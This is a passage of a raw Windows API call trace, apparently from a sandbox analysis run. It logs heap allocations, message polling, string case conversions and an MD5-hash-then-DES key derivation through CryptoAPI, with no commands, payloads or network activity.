returned 0x24a9df8 [0260.354] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.354] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.354] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.354] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.354] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.355] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.355] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.355] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.355] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.355] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.356] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.356] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.356] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.356] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.356] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.357] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.359] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.360] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.360] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.360] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.360] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.360] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.361] CryptHashData (hHash=0xaa57a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.361] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.362] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.362] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.363] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.363] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.363] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.364] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 